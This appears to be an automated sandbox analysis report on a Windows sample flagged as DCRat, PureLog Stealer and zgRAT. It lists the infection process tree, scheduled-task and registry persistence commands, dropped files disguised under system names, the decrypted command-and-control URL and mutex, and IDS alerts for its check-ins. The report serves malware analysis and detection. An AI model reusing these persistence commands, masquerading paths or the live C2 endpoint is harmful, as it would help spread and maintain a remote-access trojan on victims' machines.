Windows Analysis Report
EjS7Q5fFCE.exe

Overview

General Information

Sample name: EjS7Q5fFCE.exe (renamed because the original name is a hash value)
Original sample name: 5fa3d2d795206f9981b7bd191c423d65.exe
Analysis ID: 1581773
MD5: 5fa3d2d795206f9981b7bd191c423d65
SHA1: e4fb0a0e2c1dc7c1bca06c791ad1ad05a67016ca
SHA256: 0a9c437939c86beb90ce02ac853983c7daca5d801489b81f537d6c9b9c4796b3
Tags: DCRat, exe, user-abuse_ch

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SLDT)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • EjS7Q5fFCE.exe (PID: 7568 cmdline: "C:\Users\user\Desktop\EjS7Q5fFCE.exe" MD5: 5FA3D2D795206F9981B7BD191C423D65)
    • wscript.exe (PID: 7612 cmdline: "C:\Windows\System32\WScript.exe" "C:\ComproviderComponentIntocommon\9ILuIMngNdMuzngHHMAY9BVvKTDwm0yZ13RpFsRY.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 8024 cmdline: C:\Windows\system32\cmd.exe /c ""C:\ComproviderComponentIntocommon\9j6CCih.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Portsessionsvc.exe (PID: 8076 cmdline: "C:\ComproviderComponentIntocommon/Portsessionsvc.exe" MD5: 5231D0FCCC4F24F5B3D76964B3513636)
          • schtasks.exe (PID: 8164 cmdline: schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 7 /tr "'C:\Windows\Resources\Themes\smartscreen.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8188 cmdline: schtasks.exe /create /tn "smartscreen" /sc ONLOGON /tr "'C:\Windows\Resources\Themes\smartscreen.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7188 cmdline: schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 10 /tr "'C:\Windows\Resources\Themes\smartscreen.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • csc.exe (PID: 7252 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jgewpxd5\jgewpxd5.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 7240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 7344 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF1F4.tmp" "c:\Windows\System32\CSC14843E573E24440A98F4B13FC0AF1E.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • schtasks.exe (PID: 5480 cmdline: schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 9 /tr "'C:\Recovery\dwm.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4488 cmdline: schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Recovery\dwm.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4408 cmdline: schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 13 /tr "'C:\Recovery\dwm.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1368 cmdline: schtasks.exe /create /tn "iEIWJugOSvvEyboGDFYpQi" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\iEIWJugOSvvEyboGDFYpQ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1208 cmdline: schtasks.exe /create /tn "iEIWJugOSvvEyboGDFYpQ" /sc ONLOGON /tr "'C:\Users\All Users\iEIWJugOSvvEyboGDFYpQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1420 cmdline: schtasks.exe /create /tn "iEIWJugOSvvEyboGDFYpQi" /sc MINUTE /mo 8 /tr "'C:\Users\All Users\iEIWJugOSvvEyboGDFYpQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7464 cmdline: schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 13 /tr "'C:\ComproviderComponentIntocommon\ctfmon.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3512 cmdline: schtasks.exe /create /tn "ctfmon" /sc ONLOGON /tr "'C:\ComproviderComponentIntocommon\ctfmon.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7228 cmdline: schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 5 /tr "'C:\ComproviderComponentIntocommon\ctfmon.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7492 cmdline: schtasks.exe /create /tn "iEIWJugOSvvEyboGDFYpQi" /sc MINUTE /mo 8 /tr "'C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7584 cmdline: schtasks.exe /create /tn "iEIWJugOSvvEyboGDFYpQ" /sc ONLOGON /tr "'C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7568 cmdline: schtasks.exe /create /tn "iEIWJugOSvvEyboGDFYpQi" /sc MINUTE /mo 8 /tr "'C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7292 cmdline: schtasks.exe /create /tn "PortsessionsvcP" /sc MINUTE /mo 9 /tr "'C:\ComproviderComponentIntocommon\Portsessionsvc.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7304 cmdline: schtasks.exe /create /tn "Portsessionsvc" /sc ONLOGON /tr "'C:\ComproviderComponentIntocommon\Portsessionsvc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 332 cmdline: schtasks.exe /create /tn "PortsessionsvcP" /sc MINUTE /mo 9 /tr "'C:\ComproviderComponentIntocommon\Portsessionsvc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • cmd.exe (PID: 1816 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jdisWpWAyY.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 2516 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • PING.EXE (PID: 7764 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
  • ctfmon.exe (PID: 5980 cmdline: C:\ComproviderComponentIntocommon\ctfmon.exe MD5: 5231D0FCCC4F24F5B3D76964B3513636)
  • ctfmon.exe (PID: 980 cmdline: C:\ComproviderComponentIntocommon\ctfmon.exe MD5: 5231D0FCCC4F24F5B3D76964B3513636)
  • dwm.exe (PID: 1220 cmdline: C:\Recovery\dwm.exe MD5: 5231D0FCCC4F24F5B3D76964B3513636)
  • dwm.exe (PID: 1780 cmdline: C:\Recovery\dwm.exe MD5: 5231D0FCCC4F24F5B3D76964B3513636)
  • Portsessionsvc.exe (PID: 3412 cmdline: C:\ComproviderComponentIntocommon\Portsessionsvc.exe MD5: 5231D0FCCC4F24F5B3D76964B3513636)
  • Portsessionsvc.exe (PID: 7864 cmdline: C:\ComproviderComponentIntocommon\Portsessionsvc.exe MD5: 5231D0FCCC4F24F5B3D76964B3513636)
  • smartscreen.exe (PID: 2828 cmdline: C:\Windows\Resources\Themes\smartscreen.exe MD5: 5231D0FCCC4F24F5B3D76964B3513636)
  • smartscreen.exe (PID: 1028 cmdline: C:\Windows\Resources\Themes\smartscreen.exe MD5: 5231D0FCCC4F24F5B3D76964B3513636)
    • cmd.exe (PID: 7056 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Ycxw1CWDXu.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 5936 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
  • smartscreen.exe (PID: 6348 cmdline: "C:\Windows\Resources\Themes\smartscreen.exe" MD5: 5231D0FCCC4F24F5B3D76964B3513636)
  • cleanup
DCRat malware configuration: {"C2 url": "http://001031cm.nyashteam.ru/pythonProcessdefaultWordpressdatalifetempcdnDownloads", "MUTEX": "DCR_MUTEX-5T1XqD41gjMZTLBOC4hB"}
Source | Rule | Description | Author
EjS7Q5fFCE.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
EjS7Q5fFCE.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security

Source | Rule | Description | Author
C:\ProgramData\iEIWJugOSvvEyboGDFYpQ.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
C:\ProgramData\iEIWJugOSvvEyboGDFYpQ.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
C:\ProgramData\iEIWJugOSvvEyboGDFYpQ.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
C:\ProgramData\iEIWJugOSvvEyboGDFYpQ.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
C:\Recovery\dwm.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
(7 further entries not shown)

Source | Rule | Description | Author
00000007.00000002.2024446446.0000000012C81000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
00000000.00000003.1668240113.0000000006958000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000007.00000000.1966174195.0000000000762000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000000.00000003.1669422200.00000000052BE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000000.00000003.1668710147.00000000052B2000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
(3 further entries not shown)

Source | Rule | Description | Author
0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
7.0.Portsessionsvc.exe.760000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
7.0.Portsessionsvc.exe.760000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
0.3.EjS7Q5fFCE.exe.69a6705.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
(4 further entries not shown)

System Summary

Source: File created
  Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
  Data: EventID: 11, Image: C:\ComproviderComponentIntocommon\Portsessionsvc.exe, ProcessId: 8076, TargetFilename: C:\Recovery\dwm.exe
Source: Process started
  Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali
  Data: Command: C:\Recovery\dwm.exe, CommandLine: C:\Recovery\dwm.exe, CommandLine|base64offset|contains: , Image: C:\Recovery\dwm.exe, NewProcessName: C:\Recovery\dwm.exe, OriginalFileName: C:\Recovery\dwm.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Recovery\dwm.exe, ProcessId: 1220, ProcessName: dwm.exe
Source: Registry Key set
  Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
  Data: Details: "C:\Windows\Resources\Themes\smartscreen.exe", EventID: 13, EventType: SetValue, Image: C:\ComproviderComponentIntocommon\Portsessionsvc.exe, ProcessId: 8076, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smartscreen
Source: Registry Key set
  Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
  Data: Details: explorer.exe, "C:\Windows\Resources\Themes\smartscreen.exe", EventID: 13, EventType: SetValue, Image: C:\ComproviderComponentIntocommon\Portsessionsvc.exe, ProcessId: 8076, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
Source: Process started
  Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems)
  Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jgewpxd5\jgewpxd5.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jgewpxd5\jgewpxd5.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\ComproviderComponentIntocommon/Portsessionsvc.exe", ParentImage: C:\ComproviderComponentIntocommon\Portsessionsvc.exe, ParentProcessId: 8076, ParentProcessName: Portsessionsvc.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jgewpxd5\jgewpxd5.cmdline", ProcessId: 7252, ProcessName: csc.exe
Source: Process started
  Author: Michael Haag
  Data: Command: "C:\Windows\System32\WScript.exe" "C:\ComproviderComponentIntocommon\9ILuIMngNdMuzngHHMAY9BVvKTDwm0yZ13RpFsRY.vbe", CommandLine: "C:\Windows\System32\WScript.exe" "C:\ComproviderComponentIntocommon\9ILuIMngNdMuzngHHMAY9BVvKTDwm0yZ13RpFsRY.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\EjS7Q5fFCE.exe", ParentImage: C:\Users\user\Desktop\EjS7Q5fFCE.exe, ParentProcessId: 7568, ParentProcessName: EjS7Q5fFCE.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ComproviderComponentIntocommon\9ILuIMngNdMuzngHHMAY9BVvKTDwm0yZ13RpFsRY.vbe", ProcessId: 7612, ProcessName: wscript.exe
Source: File created
  Author: frack113
  Data: EventID: 11, Image: C:\ComproviderComponentIntocommon\Portsessionsvc.exe, ProcessId: 8076, TargetFilename: C:\Users\user\AppData\Local\Temp\jgewpxd5\jgewpxd5.cmdline

Data Obfuscation

Source: Process started
  Author: Joe Security
  Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jgewpxd5\jgewpxd5.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jgewpxd5\jgewpxd5.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\ComproviderComponentIntocommon/Portsessionsvc.exe", ParentImage: C:\ComproviderComponentIntocommon\Portsessionsvc.exe, ParentProcessId: 8076, ParentProcessName: Portsessionsvc.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jgewpxd5\jgewpxd5.cmdline", ProcessId: 7252, ProcessName: csc.exe

Persistence and Installation Behavior

Source: Process started
  Author: Joe Security
  Data: Command: schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 7 /tr "'C:\Windows\Resources\Themes\smartscreen.exe'" /f, CommandLine: schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 7 /tr "'C:\Windows\Resources\Themes\smartscreen.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\ComproviderComponentIntocommon/Portsessionsvc.exe", ParentImage: C:\ComproviderComponentIntocommon\Portsessionsvc.exe, ParentProcessId: 8076, ParentProcessName: Portsessionsvc.exe, ProcessCommandLine: schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 7 /tr "'C:\Windows\Resources\Themes\smartscreen.exe'" /f, ProcessId: 8164, ProcessName: schtasks.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-28T23:47:51.521067+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 172.67.186.200 | 80 | TCP
2024-12-28T23:48:01.271035+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49737 | 172.67.186.200 | 80 | TCP
2024-12-28T23:48:06.317910+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49739 | 172.67.186.200 | 80 | TCP
2024-12-28T23:48:09.817923+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49746 | 172.67.186.200 | 80 | TCP
2024-12-28T23:48:13.771059+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49757 | 172.67.186.200 | 80 | TCP
2024-12-28T23:48:18.317923+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49768 | 172.67.186.200 | 80 | TCP
2024-12-28T23:48:21.474187+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49773 | 172.67.186.200 | 80 | TCP
2024-12-28T23:48:44.661706+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49825 | 172.67.186.200 | 80 | TCP
2024-12-28T23:48:53.021104+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49845 | 172.67.186.200 | 80 | TCP
2024-12-28T23:49:01.349232+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49863 | 172.67.186.200 | 80 | TCP
2024-12-28T23:49:10.364878+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49883 | 172.67.186.200 | 80 | TCP
2024-12-28T23:49:13.583634+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49892 | 172.67.186.200 | 80 | TCP

AV Detection

Source: EjS7Q5fFCE.exe | Avira: detected
Source: http://001031cm.nyashteam.ru/ | Avira URL Cloud: Label: malware
Source: http://001031cm.nyashteam.ru | Avira URL Cloud: Label: malware
Source: http://001031cm.nyashteam.ru/pythonProcessdefaultWordpressdatalifetempcdnDownloads.php | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\jdisWpWAyY.bat | Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\Ycxw1CWDXu.bat | Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Recovery\dwm.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Windows\Resources\Themes\smartscreen.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\ComproviderComponentIntocommon\ctfmon.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\ProgramData\iEIWJugOSvvEyboGDFYpQ.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\ProgramData\iEIWJugOSvvEyboGDFYpQ.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\ComproviderComponentIntocommon\9ILuIMngNdMuzngHHMAY9BVvKTDwm0yZ13RpFsRY.vbe | Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: 00000007.00000002.2024446446.0000000012C81000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: DCRat {"C2 url": "http://001031cm.nyashteam.ru/pythonProcessdefaultWordpressdatalifetempcdnDownloads", "MUTEX": "DCR_MUTEX-5T1XqD41gjMZTLBOC4hB"}
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | ReversingLabs: Detection: 78%
Source: C:\ComproviderComponentIntocommon\ctfmon.exe | ReversingLabs: Detection: 78%
Source: C:\ProgramData\iEIWJugOSvvEyboGDFYpQ.exe | ReversingLabs: Detection: 78%
Source: C:\Recovery\dwm.exe | ReversingLabs: Detection: 78%
Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | ReversingLabs: Detection: 78%
Source: C:\Users\user\Desktop\etRRuFlx.log | ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\kwWqKlvO.log | ReversingLabs: Detection: 25%
Source: C:\Windows\Resources\Themes\smartscreen.exe | ReversingLabs: Detection: 78%
Source: EjS7Q5fFCE.exe | ReversingLabs: Detection: 62%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 98.3% probability
Source: C:\Recovery\dwm.exe | Joe Sandbox ML: detected
Source: C:\Windows\System32\SecurityHealthSystray.exe | Joe Sandbox ML: detected
Source: C:\Windows\Resources\Themes\smartscreen.exe | Joe Sandbox ML: detected
Source: C:\ComproviderComponentIntocommon\ctfmon.exe | Joe Sandbox ML: detected
Source: C:\ProgramData\iEIWJugOSvvEyboGDFYpQ.exe | Joe Sandbox ML: detected
Source: C:\ProgramData\iEIWJugOSvvEyboGDFYpQ.exe | Joe Sandbox ML: detected
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Joe Sandbox ML: detected
Source: EjS7Q5fFCE.exe | Joe Sandbox ML: detected
Source: 00000007.00000002.2024446446.0000000012C81000.00000004.00000800.00020000.00000000.sdmp | String decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-5T1XqD41gjMZTLBOC4hB","0","","","5","2","WyIxIiwiIiwiNSJd","WyIiLCJXeUlpTENJaUxDSmlibFp6WWtFOVBTSmQiXQ=="]
Source: 00000007.00000002.2024446446.0000000012C81000.00000004.00000800.00020000.00000000.sdmp | String decryptor: [["http://001031cm.nyashteam.ru/","pythonProcessdefaultWordpressdatalifetempcdnDownloads"]]
Source: EjS7Q5fFCE.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: EjS7Q5fFCE.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb | source: EjS7Q5fFCE.exe
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\jgewpxd5\jgewpxd5.pdb | source: Portsessionsvc.exe, 00000007.00000002.2015114062.00000000034EB000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: em.pdbB4 | source: smartscreen.exe, 0000002A.00000002.2142062522.000000001B68F000.00000004.00000020.00020000.00000000.sdmp

Spreading

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Code function: 0_2_0042A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0042A69B
Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Code function: 0_2_0043C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0043C220
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | File opened: C:\Users\user
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | File opened: C:\Users\user\AppData
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | File opened: C:\Users\user\AppData\Local

                                    Networking

                                    barindex
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49739 -> 172.67.186.200:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49736 -> 172.67.186.200:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49757 -> 172.67.186.200:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49737 -> 172.67.186.200:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49746 -> 172.67.186.200:80
